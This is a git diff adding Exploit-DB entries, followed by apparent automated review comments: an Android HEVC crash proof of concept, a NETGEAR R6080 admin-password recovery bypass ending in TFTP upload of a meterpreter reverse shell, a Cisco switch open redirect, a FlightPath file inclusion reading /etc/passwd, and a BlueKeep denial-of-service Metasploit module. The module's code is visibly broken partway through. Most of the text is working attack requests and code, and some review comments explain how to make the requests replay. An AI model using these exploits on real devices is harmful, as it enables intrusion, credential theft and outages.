diff --git a/exploits/android/dos/47119.txt b/exploits/android/dos/47119.txt
new file mode 100644
index 000000000..bdfa5c31f
--- /dev/null
+++ b/exploits/android/dos/47119.txt
@@ -0,0 +1,79 @@
+CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve
+
+
+More infos
+LineageOS (Android):
+
+02-11 20:18:48.238 260 260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08
+02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.239 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Error parsing NAL unit #5.
+02-11 20:18:48.240 260 260 I FFMPEG : [hevc @ 0xb348f000] Invalid tile widths.
+mplayer (laptop)
+
+id: 0
+[hevc @ 0x7f0bf58a7560]Decoding VPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding SPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding VUI
+[hevc @ 0x7f0bf58a7560]Decoding PPS
+[hevc @ 0x7f0bf58a7560]Invalid tile widths.
+[hevc @ 0x7f0bf58a7560]Decoding SEI
+[hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5
+[hevc @ 0x7f0bf58a7560]PPS id out of range: 0
+[hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5.
+Error while decoding frame!
+This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526
+
+So the check are there.
+
+On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer.
+
+https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/
+
+I have the google codec:
+
+OMX.google.hevc.decoder
+
+I am wondering however why it does not crash ....
+
+Attaching the video (videopoc.mp4) that should trigger this condition:
+
+if (value >= ps_sps->i2_pic_wd_in_ctb - start)
++ {
++ return IHEVCD_INVALID_HEADER;
++ }
+Maybe somebody have more luck.
+
+More infos 2
+Whoooo hooo .... made it :)
+
+Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players.
+
+Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload.
+
+07-13 21:50:59.000 3351 3351 I /system/bin/tombstoned: received crash request for pid 24089
+07-13 21:50:59.006 24089 24089 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+07-13 21:50:59.006 24089 24089 F DEBUG : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys'
+07-13 21:50:59.006 24089 24089 F DEBUG : Revision: '9'
+07-13 21:50:59.006 24089 24089 F DEBUG : ABI: 'arm64'
+07-13 21:50:59.006 24089 24089 F DEBUG : pid: 24089, tid: 24089, name: media.extractor >>> mediaextractor <<<
+07-13 21:50:59.006 24089 24089 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050
+07-13 21:50:59.009 24089 24089 F DEBUG : x0 00000000ffffff36 x1 0000000000000000 x2 00000000000000f0 x3 0000000000000001
+07-13 21:50:59.009 24089 24089 F DEBUG : x4 0000000000000001 x5 0000007ccb5df1b8 x6 0000007cc927363e x7 0000007cc8e7bd04
+07-13 21:50:59.009 24089 24089 F DEBUG : x8 0000000000004170 x9 0000000000004160 x10 00000000ffffffff x11 0000007ccb7fbef0
+07-13 21:50:59.010 24089 24089 F DEBUG : x12 0000007ccb5d3ce0 x13 000000000000001e x14 0000000000000003 x15 0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG : x16 0000007cc99f5f50 x17 0000007ccb88885c x18 0000007ccb566225 x19 0000007ccb562020
+07-13 21:50:59.010 24089 24089 F DEBUG : x20 0000007ccb4f18a0 x21 0000007ccb468c6c x22 0000000000000000 x23 0000000000000006
+07-13 21:50:59.010 24089 24089 F DEBUG : x24 000000000000001e x25 0000000000000094 x26 0000000000004160 x27 0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG : x28 0000007ccb55e750 x29 0000007fd6d39d90 x30 0000007cc99c4438
+07-13 21:50:59.010 24089 24089 F DEBUG : sp 0000007fd6d39d20 pc 0000007cc99c44c4 pstate 0000000080000000
+07-13 21:50:59.013 24089 24089 F DEBUG :
+--
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip
\ No newline at end of file
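Review bot: The tombstone (`name: media.extractor >>> mediaextractor <<<`) shows the SIGSEGV in the extractor process, not in a decoder running as the mediacodec user as the opening paragraph claims, so the writeup's statement about which privilege boundary is reached is contradicted by its own evidence. The trace is a plain SEGV_MAPERR on an unmapped read with no register or PC control shown, which supports the dos/ classification but not the "You can own the mobile by viewing a video" sentence; I would reword it to `Only a crash (SIGSEGV in mediaextractor) is demonstrated here; code execution is not shown.` It would also help to record the security patch level of the tested Samsung 8.0.0 build next to the fingerprint, since whether that build carries the fix for CVE-2019-2107 cannot be read from the fingerprint alone. Finally, the libhevc snippet (`if (value >= ps_sps->i2_pic_wd_in_ctb - start)`) is quoted without a file/function reference, so a reader cannot tell which check the PoC is meant to exercise.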
diff --git a/exploits/hardware/webapps/47117.txt b/exploits/hardware/webapps/47117.txt
new file mode 100644
index 000000000..dcb7a8a55
--- /dev/null
+++ b/exploits/hardware/webapps/47117.txt
@@ -0,0 +1,77 @@
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+SSSSSSSNNNNNN
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+
+
+
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
+
+
+
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+SSSSSSSNNNNNN
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+
+
+
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
\ No newline at end of file
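Review bot: The file body is pasted twice — everything from `# Exploit Title:` through the closing `}` of the telnet section repeats verbatim after the first copy — so the duplicate should be dropped before publication. The actual bypass is buried in the "(replace)/(by)" lines: the only change is `next_file=securityquestions.htm` → `next_file=PWD_password.htm`, which suggests the recovery CGI trusts a client-supplied next page and lets the security-question step be skipped; stating that in one sentence, e.g. `The bypass is that next_file is client-controlled, so the security-questions page can be skipped by naming PWD_password.htm directly.`, would make the advisory usable. It would also help to say explicitly that the serial `SSSSSSSNNNNNN` is read from the unauthenticated UPnP description on port 56688 (the prerequisite for the whole chain, and only reachable from the LAN as shown), and that the telnet/TFTP section runs with the recovered admin password after `setup.cgi?todo=debug`, i.e. it is post-authentication tooling rather than a separate vulnerability.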
diff --git a/exploits/hardware/webapps/47118.txt b/exploits/hardware/webapps/47118.txt
new file mode 100644
index 000000000..365b4611e
--- /dev/null
+++ b/exploits/hardware/webapps/47118.txt
@@ -0,0 +1,121 @@
+# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
+# Shodan query: /config/log_off_page.html
+# Discovered Date: 07/03/2014
+# Reported Date: 08/04/2019
+# Exploit Author: Ramikan
+# Website: http://fact-in-hack.blogspot.com
+# Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
+# Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled,
+# Tested On: Cisco C300 Switch
+# Version: 1.3.7.18
+# CVE : CVE-2019-1943
+# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
+# Category:Hardware, Web Apps
+# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+
+*************************************************************************************************************************************
+
+Vulnerability 1: Information Gathering
+
+*************************************************************************************************************************************
+
+Unauthenticated user can find the version number and device type by visiting this link directly.
+
+Affected URL:
+
+/cs703dae2c/device/English/dictionaryLogin.xml
+
+*************************************************************************************************************************************
+
+Vulnerability 2: Open Redirect due to host header.
+
+*************************************************************************************************************************************
+
+Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.
+
+Normal Request
+
+GET / HTTP/1.1
+Host: 10.1.1.120
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+Normal Response
+
+HTTP/1.1 302 Redirect
+Server: GoAhead-Webs
+Date: Fri Mar 07 09:40:22 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: https://10.21.151.120/cs703dae2c/
+
+
+ This document has moved to a new location.
+ Please update your documents to reflect the new location.
+
+*************************************************************************************************************************************
+POC
+*************************************************************************************************************************************
+
+Host Header changed to different domain (example google.com).
+
+Request:
+
+GET /cs703dae2c HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: activeLangId=English; isStackableDevice=false
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 302 Redirect
+activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
+Date: Fri Mar 07 09:45:26 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://google.com/cs703dae2c/config/log_off_page.htm
+
+
+ This document has moved to a new location.
+ Please update your documents to reflect the new location.
+
+
+
+The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.
+
+*************************************************************************************************************************************
+Attack Vector:
+*************************************************************************************************************************************
+Can be used for domain fronting.
+
+curl -k --header "Host: attack.host.net" "domainname of the cisco device"
+
+
+*************************************************************************************************************************************
+Vendor Response:
+*************************************************************************************************************************************
+
+Issue 1:
+Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.
+
+Issue 2:
+The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.
+
+We have assigned CVE CVE-2019-1943 for this issue.
+
+Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+*************************************************************************************************************************************
\ No newline at end of file
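Review bot: The "domain fronting" framing (in the Vulnerability 2 description and the Attack Vector section) does not describe what the request/response pair shows: the device reflects the client's Host header into the 302 `Location`, which is Host-header injection leading to an open redirect, whereas domain fronting is a CDN/TLS-SNI technique unrelated to this behaviour. I would replace the attack-vector sentence with `Host header is reflected into the redirect Location; usable for phishing redirects when the attacker can alter the victim's request (consistent with AC:H/UI:R in the CVSS vector).` Two capture issues also need cleanup: the "Normal Request" carries `Host: 10.1.1.120` but its response redirects to `https://10.21.151.120/...`, and the PoC response line `activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs` has the request cookie pasted onto the Server header, so both should be re-captured or redacted consistently. The curl example also needs a URL scheme and `-i` so the Location header is printed; as written it will only show the short "document has moved" body and not demonstrate the redirect.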
diff --git a/exploits/php/webapps/47121.txt b/exploits/php/webapps/47121.txt
new file mode 100644
index 000000000..b5c9bdc7a
--- /dev/null
+++ b/exploits/php/webapps/47121.txt
@@ -0,0 +1,33 @@
+# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
+# Date: 07-07-2019
+# Exploit Author: Mohammed Althibyani
+# Vendor Homepage: http://getflightpath.com
+# Software Link: http://getflightpath.com/project/9/releases
+# Version: < 4.8.2 & < 5.0-rc2
+# Tested on: Kali Linux
+# CVE : CVE-2019-13396
+
+
+# Parameters : include_form
+# POST Method:
+
+use the login form to get right form_token [ you can use wrong user/pass ]
+
+This is how to POST looks like:
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login
+
+
+# modfiy the POST request to be:
+
+
+POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+
+callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+
+
+
+
+# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.
\ No newline at end of file
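Review bot: The PoC request as written is probably not replayable on its own: the `form_token` is obtained by submitting the login form first, which presumably binds it to the session cookie that received it, yet neither POST shows a `Cookie:` (or `Content-Type: application/x-www-form-urlencoded`) header, so a reader copying the second request verbatim will likely be rejected before `form_include` is ever evaluated. I would add one line above the first POST: `Keep the session cookie (PHPSESSID or equivalent) from the login attempt and send it with the second request; the form_token is only valid for that session.` The traversal value `../../../../../../../../../etc/passwd` also leaves out the detail a tester needs — the advisory should state where in the response the included file appears, or whether the include is blind, since that determines the practical impact of this LFI.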
diff --git a/exploits/windows/dos/47120.rb b/exploits/windows/dos/47120.rb
new file mode 100755
index 000000000..2bd87cbc3
--- /dev/null
+++ b/exploits/windows/dos/47120.rb
@@ -0,0 +1,1004 @@
+# Exploit Title: Bluekeep Denial of Service (metasploit module)
+# Shodan Dork: port:3389
+# Date: 07/14/2019
+# Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/)
+# Vendor Homepage: https://microsoft.com
+# Version: all affected RDP services by cve-2019-0708
+# Tested on: Windows XP (32-bits) / Windows 7 (64-bits)
+# CVE : 2019-0708
+
+# I just modified the initial metasploit module for this vuln to produce a denial of service attack.
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ Rank = NormalRanking
+
+ include Msf::Auxiliary::Dos
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE',
+ 'Description' => %q{
+ This module checks a range of hosts for the CVE-2019-0708 vulnerability
+ by binding the MS_T120 channel outside of its normal slot and sending
+ DoS packets.
+ },
+ 'Author' =>
+ [
+ 'National Cyber Security Centre', # Discovery
+ 'JaGoTu', # Module
+ 'zerosum0x0', # Module
+ 'Tom Sellers', # TLS support and documented packets
+ 'RAMELLA Sebastien' # Denial of service module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-0708' ],
+ [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ]
+ ],
+ 'DisclosureDate' => '2019-05-14',
+ 'License' => MSF_LICENSE,
+ 'Notes' =>
+ {
+ 'Stability' => [ CRASH_OS_DOWN ],
+ 'AKA' => ['BlueKeep']
+ }
+ ))
+
+ register_options(
+ [
+ OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']),
+ OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']),
+ OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']),
+ OptString.new('RDP_USER', [ false, 'The username to report during connection.']),
+ OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']),
+ OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389])
+ ]
+ )
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ def bin_to_hex(s)
+ return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join)
+ end
+
+ def bytes_to_bignum(bytesIn, order = "little")
+ bytes = bin_to_hex(bytesIn)
+ if(order == "little")
+ bytes = bytes.scan(/../).reverse.join('')
+ end
+ s = "0x" + bytes
+
+ return(s.to_i(16))
+ end
+
+ ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
+ def int_to_bytestring(daInt, num_chars = nil)
+ unless(num_chars)
+ bits_needed = Math.log(daInt) / Math.log(2)
+ num_chars = (bits_needed / 8.0).ceil
+ end
+ if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ])
+ [daInt].pack(pack_code)
+ else
+ a = (0..(num_chars)).map{ | i |
+ (( daInt >> i*8 ) & 0xFF ).chr
+ }.join
+ a[0..-2] # Seems legit lol!
+ end
+ end
+
+ def open_connection()
+ begin
+ connect()
+ sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
+ rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+ vprint_error("Connection error: #{e.message}")
+ return(false)
+ end
+
+ return(true)
+ end
+
+ def rsa_encrypt(bignum, rsexp, rsmod)
+ return((bignum ** rsexp) % rsmod)
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ ## Used to abruptly abort scanner for a given host.
+ class RdpCommunicationError < StandardError
+ end
+
+ ## Define standard RDP constants.
+ class RDPConstants
+ PROTOCOL_RDP = 0
+ end
+
+ DEFAULT_CHANNELS_DEFS =
+ "\x04\x00\x00\x00" + # channelCount: 4
+
+ ## Channels definitions consist of a name (8 bytes) and options flags
+ ## (4 bytes). Names are up to 7 ANSI characters with null termination.
+ "\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd
+ "\x0f\x00\x00\xc0" +
+ "\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr
+ "\x00\x00\xa0\xc0" +
+ "\x64\x72\x64\x79\x6e\x76\x63" + # drdynvc
+ "\x00\x00\x00\x80\xc0" +
+ "\x4d\x53\x5f\x54\x31\x32\x30" + # MS_T120
+ "\x00\x00\x00\x00\x00"
+
+ ## Builds x.224 Data (DT) TPDU - Section 13.7
+ def rdp_build_data_tpdu(data)
+ tpkt_length = data.length + 7
+
+ "\x03\x00" + # TPKT Header version 03, reserved 0
+ [tpkt_length].pack("S>") + # TPKT length
+ "\x02\xf0" + # X.224 Data TPDU (2 bytes)
+ "\x80" + # X.224 End Of Transmission (0x80)
+ data
+ end
+
+ ## Build the X.224 packet, encrypt with Standard RDP Security as needed.
+ ## Default channel_id = 0x03eb = 1003.
+ def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true)
+ flags = 0
+ flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT
+ flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT
+
+ pdu = ""
+
+ ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1
+ ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs.
+ if(client_info || rdp_sec)
+ pdu << [flags].pack("S<") # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
+ pdu << "\x00\x00" # flagsHi
+ end
+
+ if(rdp_sec)
+ ## Encrypt the payload with RDP Standard Encryption.
+ pdu << rdp_hmac(hmackey, data)[0..7]
+ pdu << rdp_rc4_crypt(rc4enckey, data)
+ else
+ pdu << data
+ end
+
+ user_data_len = pdu.length
+ udl_with_flag = 0x8000 | user_data_len
+
+ pkt = "\x64" # sendDataRequest
+ pkt << "\x00\x08" # intiator userId (TODO: for a functional client this isn't static)
+ pkt << channel_id # channelId
+ pkt << "\x70" # dataPriority
+ pkt << [udl_with_flag].pack("S>")
+ pkt << pdu
+
+ return(rdp_build_data_tpdu(pkt))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
+ ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
+ def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03")
+ total_len = data.length + 6
+
+ return(
+ [total_len].pack("S<") + # totalLength - includes all headers
+ [type].pack("S<") + # pduType - flags 16 bit, unsigned
+ channel_id + # PDUSource: 0x03f1 = 1009
+ data
+ )
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
+ ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
+ def rdp_build_share_data_header(type, data)
+ uncompressed_len = data.length + 4
+
+ return(
+ "\xea\x03\x01\x00" + # shareId: 66538
+ "\x00" + # pad1
+ "\x01" + # streamID: 1
+ [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
+ [type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
+ "\x00" + # compressedType: 0
+ "\x00\x00" + # compressedLength: 0
+ data
+ )
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
+ ## Virtual Channel PDU 2.2.6.1
+ def rdp_build_virtual_channel_pdu(flags, data)
+ data_len = data.length
+
+ return(
+ [data_len].pack("L<") + # length
+ [flags].pack("L<") + # flags
+ data
+ )
+ end
+
+ def rdp_calculate_rc4_keys(client_random, server_random)
+ ## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom).
+ preMasterSecret = client_random[0..23] + server_random[0..23]
+
+ ## PreMasterHash(I) = SaltedHash(preMasterSecret, I)
+ ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343).
+ masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) + rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)
+
+ ## MasterHash(I) = SaltedHash(MasterSecret, I)
+ ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A).
+ sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) + rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)
+
+ ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)).
+ initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
+
+ ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)).
+ initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
+
+ macKey = sessionKeyBlob[0..15]
+
+ return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob
+ end
+
+ def rdp_connection_initiation()
+ ## Code to check if RDP is open or not.
+ vprint_status("Verifying RDP protocol...")
+
+ vprint_status("Attempting to connect using RDP security")
+ rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP))
+
+ received = sock.get_once(-1, 5)
+
+ ## TODO: fix it.
+ if (received and received.include? "\x00\x12\x34\x00")
+ return(true)
+ end
+
+ return(false)
+ end
+
+ ## FinalHash(K) = MD5(K + ClientRandom + ServerRandom).
+ def rdp_final_hash(k, client_random_bytes, server_random_bytes)
+ md5 = Digest::MD5.new
+
+ md5 << k
+ md5 << client_random_bytes
+ md5 << server_random_bytes
+
+ return([md5.hexdigest].pack("H*"))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
+ ## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
+ ## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
+ ## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923".
+ def rdp_hmac(mac_salt_key, data_content)
+ sha1 = Digest::SHA1.new
+ md5 = Digest::MD5.new
+
+ pad1 = "\x36" * 40
+ pad2 = "\x5c" * 48
+
+ sha1 << mac_salt_key
+ sha1 << pad1
+ sha1 << [data_content.length].pack('")[0], 5)
+ raise RdpCommunicationError unless buffer_2 # nil due to a timeout
+
+ vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}")
+ return(buffer_1 + buffer_2)
+ end
+
+ def rdp_send(data)
+ vprint_status("Send data: #{bin_to_hex(data)}")
+
+ sock.put(data)
+ end
+
+ def rdp_sendrecv(data)
+ rdp_send(data)
+
+ return(rdp_recv())
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
+ ## Client X.224 Connect Request PDU - 2.2.1.1
+ def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP)
+ ## Blank username is valid, nil is random.
+ user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)
+ tpkt_len = user_name.length + 38
+ x224_len = user_name.length + 33
+
+ return(
+ "\x03\x00" + # TPKT Header version 03, reserved 0
+ [tpkt_len].pack("S>") + # TPKT length: 43
+ [x224_len].pack("C") + # X.224 LengthIndicator
+ "\xe0" + # X.224 Type: Connect Request
+ "\x00\x00" + # dst reference
+ "\x00\x00" + # src reference
+ "\x00" + # class and options
+ "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash='
+ user_name + # Identifier "username"
+ "\x0d\x0a" + # cookie terminator
+ "\x01\x00" + # Type: RDP Negotiation Request (0x01)
+ "\x08\x00" + # Length
+ [requested_protocols].pack('L<') # requestedProtocols
+ )
+ end
+
+ # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
+ def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS)
